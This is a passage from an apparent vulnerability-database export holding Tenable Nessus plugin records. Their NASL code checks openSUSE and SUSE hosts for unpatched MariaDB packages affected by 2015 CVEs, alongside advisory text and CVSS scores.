script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mariadb-client-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mariadb-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mariadb-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mariadb-errormessages\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mariadb-test\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mariadb-test-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mariadb-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mariadb-tools-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/12/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/12/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE13\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"13.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libmysqlclient-devel-10.0.22-2.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libmysqlclient18-10.0.22-2.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libmysqlclient18-debuginfo-10.0.22-2.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libmysqlclient_r18-10.0.22-2.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libmysqld-devel-10.0.22-2.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libmysqld18-10.0.22-2.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libmysqld18-debuginfo-10.0.22-2.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"mariadb-10.0.22-2.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"mariadb-bench-10.0.22-2.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"mariadb-bench-debuginfo-10.0.22-2.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"mariadb-client-10.0.22-2.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"mariadb-client-debuginfo-10.0.22-2.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"mariadb-debuginfo-10.0.22-2.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"mariadb-debugsource-10.0.22-2.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"mariadb-errormessages-10.0.22-2.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"mariadb-test-10.0.22-2.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"mariadb-test-debuginfo-10.0.22-2.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"mariadb-tools-10.0.22-2.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"mariadb-tools-debuginfo-10.0.22-2.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"libmysqlclient18-32bit-10.0.22-2.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"libmysqlclient18-debuginfo-32bit-10.0.22-2.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"libmysqlclient_r18-32bit-10.0.22-2.18.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libmysqlclient-devel / libmysqlclient18 / libmysqlclient18-32bit / etc\");\n}\n", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:P"}}, {"lastseen": "2021-01-20T12:28:58", "description": "MariaDB was updated to 5.5.46 to fix security issues and bugs.\n\nThe following vulnerabilities were fixed in the upstream release :\n\nCVE-2015-4802, CVE-2015-4807, CVE-2015-4815, CVE-2015-4826,\nCVE-2015-4830, CVE-2015-4836, CVE-2015-4858, CVE-2015-4861,\nCVE-2015-4870, CVE-2015-4913, CVE-2015-4792 \n\nA list of upstream changes and release notes can be found here:\nhttps://mariadb.com/kb/en/mariadb/mariadb-5546-release-notes/\nhttps://mariadb.com/kb/en/mariadb/mariadb-5546-changelog/", "edition": 18, "published": "2015-12-18T00:00:00", "title": "openSUSE Security Update : MariaDB 5.5.46 (openSUSE-2015-890)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-4830", "CVE-2015-4913", "CVE-2015-4858", "CVE-2015-4802", "CVE-2015-4815", "CVE-2015-4792", "CVE-2015-4807", "CVE-2015-4836", "CVE-2015-4861", "CVE-2015-4870", "CVE-2015-4826"], "modified": "2015-12-18T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:mariadb-errormessages", "p-cpe:/a:novell:opensuse:mariadb-client", "p-cpe:/a:novell:opensuse:libmysqld-devel", "p-cpe:/a:novell:opensuse:mariadb-tools", "p-cpe:/a:novell:opensuse:mariadb-test-debuginfo", "p-cpe:/a:novell:opensuse:libmysqlclient18", "p-cpe:/a:novell:opensuse:mariadb-bench-debuginfo", "p-cpe:/a:novell:opensuse:mariadb-debugsource", "p-cpe:/a:novell:opensuse:libmysqlclient_r18-32bit", "p-cpe:/a:novell:opensuse:mariadb-tools-debuginfo", "p-cpe:/a:novell:opensuse:libmysqld18", "p-cpe:/a:novell:opensuse:libmysqlclient-devel", "p-cpe:/a:novell:opensuse:mariadb-debuginfo", "p-cpe:/a:novell:opensuse:libmysqlclient_r18", "p-cpe:/a:novell:opensuse:mariadb-client-debuginfo", "p-cpe:/a:novell:opensuse:libmysqld18-debuginfo", "p-cpe:/a:novell:opensuse:mariadb", "p-cpe:/a:novell:opensuse:mariadb-test", "p-cpe:/a:novell:opensuse:libmysqlclient18-32bit", "p-cpe:/a:novell:opensuse:mariadb-bench", "cpe:/o:novell:opensuse:13.1", "p-cpe:/a:novell:opensuse:libmysqlclient18-debuginfo", "p-cpe:/a:novell:opensuse:libmysqlclient18-debuginfo-32bit"], "id": "OPENSUSE-2015-890.NASL", "href": "https://www.tenable.com/plugins/nessus/87486", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2015-890.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(87486);\n script_version(\"2.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2015-4792\", \"CVE-2015-4802\", \"CVE-2015-4807\", \"CVE-2015-4815\", \"CVE-2015-4826\", \"CVE-2015-4830\", \"CVE-2015-4836\", \"CVE-2015-4858\", \"CVE-2015-4861\", \"CVE-2015-4870\", \"CVE-2015-4913\");\n\n script_name(english:\"openSUSE Security Update : MariaDB 5.5.46 (openSUSE-2015-890)\");\n script_summary(english:\"Check for the openSUSE-2015-890 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"MariaDB was updated to 5.5.46 to fix security issues and bugs.\n\nThe following vulnerabilities were fixed in the upstream release :\n\nCVE-2015-4802, CVE-2015-4807, CVE-2015-4815, CVE-2015-4826,\nCVE-2015-4830, CVE-2015-4836, CVE-2015-4858, CVE-2015-4861,\nCVE-2015-4870, CVE-2015-4913, CVE-2015-4792 \n\nA list of upstream changes and release notes can be found here:\nhttps://mariadb.com/kb/en/mariadb/mariadb-5546-release-notes/\nhttps://mariadb.com/kb/en/mariadb/mariadb-5546-changelog/\"\n );\n # https://mariadb.com/kb/en/mariadb/mariadb-5546-changelog/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://mariadb.com/kb/en/library/mariadb-5546-changelog/\"\n );\n # https://mariadb.com/kb/en/mariadb/mariadb-5546-release-notes/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://mariadb.com/kb/en/library/mariadb-5546-release-notes/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected MariaDB 5.5.46 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmysqlclient-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmysqlclient18\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmysqlclient18-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmysqlclient18-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmysqlclient18-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmysqlclient_r18\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmysqlclient_r18-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmysqld-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmysqld18\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmysqld18-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mariadb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mariadb-bench\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mariadb-bench-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mariadb-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mariadb-client-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mariadb-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mariadb-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mariadb-errormessages\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mariadb-test\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mariadb-test-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mariadb-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mariadb-tools-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.1\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/10/21\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/12/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/12/18\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE13\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"13.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libmysqlclient-devel-5.5.46-13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libmysqlclient18-5.5.46-13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libmysqlclient18-debuginfo-5.5.46-13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libmysqlclient_r18-5.5.46-13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libmysqld-devel-5.5.46-13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libmysqld18-5.5.46-13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libmysqld18-debuginfo-5.5.46-13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"mariadb-5.5.46-13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"mariadb-bench-5.5.46-13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"mariadb-bench-debuginfo-5.5.46-13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"mariadb-client-5.5.46-13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"mariadb-client-debuginfo-5.5.46-13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"mariadb-debuginfo-5.5.46-13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"mariadb-debugsource-5.5.46-13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"mariadb-errormessages-5.5.46-13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"mariadb-test-5.5.46-13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"mariadb-test-debuginfo-5.5.46-13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"mariadb-tools-5.5.46-13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"mariadb-tools-debuginfo-5.5.46-13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"libmysqlclient18-32bit-5.5.46-13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"libmysqlclient18-debuginfo-32bit-5.5.46-13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"libmysqlclient_r18-32bit-5.5.46-13.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libmysqlclient-devel / libmysqlclient18-32bit / libmysqlclient18 / etc\");\n}\n", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:P"}}, {"lastseen": "2021-01-07T14:23:29", "description": "MariaDB has been updated to version 10.0.22, which brings fixes for\nmany security issues and other improvements.\n\nThe following CVEs have been fixed :\n\n - 10.0.22: CVE-2015-4802, CVE-2015-4807, CVE-2015-4815,\n CVE-2015-4826, CVE-2015-4830, CVE-2015-4836,\n CVE-2015-4858, CVE-2015-4861, CVE-2015-4870,\n CVE-2015-4913, CVE-2015-4792\n\n - Fix information leak via mysql-systemd-helper script.\n (CVE-2015-5969, bsc#957174)\n\nFor a comprehensive list of changes refer to the upstream Release\nNotes and Change Log documents :\n\n- https://kb.askmonty.org/en/mariadb-10022-release-notes/\n\n- https://kb.askmonty.org/en/mariadb-10022-changelog/\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 28, "cvss3": {"score": 6.2, "vector": "AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2016-02-02T00:00:00", "title": "SUSE SLED12 / SLES12 Security Update : mariadb (SUSE-SU-2016:0296-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-4830", "CVE-2015-4913", "CVE-2015-4858", "CVE-2015-4802", "CVE-2015-4815", "CVE-2015-5969", "CVE-2015-4792", "CVE-2015-4807", "CVE-2015-4836", "CVE-2015-4861", "CVE-2015-4870", "CVE-2015-4826"], "modified": "2016-02-02T00:00:00", "cpe": ["cpe:/o:novell:suse_linux:12", "p-cpe:/a:novell:suse_linux:mariadb-errormessages", "p-cpe:/a:novell:suse_linux:mariadb-client-debuginfo", "p-cpe:/a:novell:suse_linux:libmysqlclient_r18", "p-cpe:/a:novell:suse_linux:mariadb-client", "p-cpe:/a:novell:suse_linux:mariadb-debugsource", "p-cpe:/a:novell:suse_linux:libmysqlclient18-debuginfo", "p-cpe:/a:novell:suse_linux:mariadb", "p-cpe:/a:novell:suse_linux:mariadb-debuginfo", "p-cpe:/a:novell:suse_linux:mariadb-tools", "p-cpe:/a:novell:suse_linux:libmysqlclient18", "p-cpe:/a:novell:suse_linux:mariadb-tools-debuginfo"], "id": "SUSE_SU-2016-0296-1.NASL", "href": "https://www.tenable.com/plugins/nessus/88515", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2016:0296-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(88515);\n script_version(\"2.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2015-4792\", \"CVE-2015-4802\", \"CVE-2015-4807\", \"CVE-2015-4815\", \"CVE-2015-4826\", \"CVE-2015-4830\", \"CVE-2015-4836\", \"CVE-2015-4858\", \"CVE-2015-4861\", \"CVE-2015-4870\", \"CVE-2015-4913\", \"CVE-2015-5969\");\n\n script_name(english:\"SUSE SLED12 / SLES12 Security Update : mariadb (SUSE-SU-2016:0296-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"MariaDB has been updated to version 10.0.22, which brings fixes for\nmany security issues and other improvements.\n\nThe following CVEs have been fixed :\n\n - 10.0.22: CVE-2015-4802, CVE-2015-4807, CVE-2015-4815,\n CVE-2015-4826, CVE-2015-4830, CVE-2015-4836,\n CVE-2015-4858, CVE-2015-4861, CVE-2015-4870,\n CVE-2015-4913, CVE-2015-4792\n\n - Fix information leak via mysql-systemd-helper script.\n (CVE-2015-5969, bsc#957174)\n\nFor a comprehensive list of changes refer to the upstream Release\nNotes and Change Log documents :\n\n- https://kb.askmonty.org/en/mariadb-10022-release-notes/\n\n- https://kb.askmonty.org/en/mariadb-10022-changelog/\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=937787\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=957174\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=958789\"\n );\n # https://kb.askmonty.org/en/mariadb-10022-changelog/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://mariadb.com/kb/en/library/mariadb-10022-changelog/\"\n );\n # https://kb.askmonty.org/en/mariadb-10022-release-notes/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://mariadb.com/kb/en/library/mariadb-10022-release-notes/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-4792/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-4802/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-4807/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-4815/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-4826/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-4830/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-4836/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-4858/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-4861/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-4870/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-4913/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-5969/\"\n );\n # https://www.suse.com/support/update/announcement/2016/suse-su-20160296-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?3caabc9c\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Workstation Extension 12-SP1 :\n\nzypper in -t patch SUSE-SLE-WE-12-SP1-2016-183=1\n\nSUSE Linux Enterprise Software Development Kit 12-SP1 :\n\nzypper in -t patch SUSE-SLE-SDK-12-SP1-2016-183=1\n\nSUSE Linux Enterprise Server 12-SP1 :\n\nzypper in -t patch SUSE-SLE-SERVER-12-SP1-2016-183=1\n\nSUSE Linux Enterprise Desktop 12-SP1 :\n\nzypper in -t patch SUSE-SLE-DESKTOP-12-SP1-2016-183=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libmysqlclient18\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libmysqlclient18-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libmysqlclient_r18\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:mariadb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:mariadb-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:mariadb-client-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:mariadb-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:mariadb-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:mariadb-errormessages\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:mariadb-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:mariadb-tools-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/10/21\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/02/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/02/02\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED12|SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED12 / SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(1)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP1\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED12\" && (! preg(pattern:\"^(1)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED12 SP1\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"libmysqlclient18-10.0.22-3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"libmysqlclient18-debuginfo-10.0.22-3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"mariadb-10.0.22-3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"mariadb-client-10.0.22-3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"mariadb-client-debuginfo-10.0.22-3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"mariadb-debuginfo-10.0.22-3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"mariadb-debugsource-10.0.22-3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"mariadb-errormessages-10.0.22-3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", 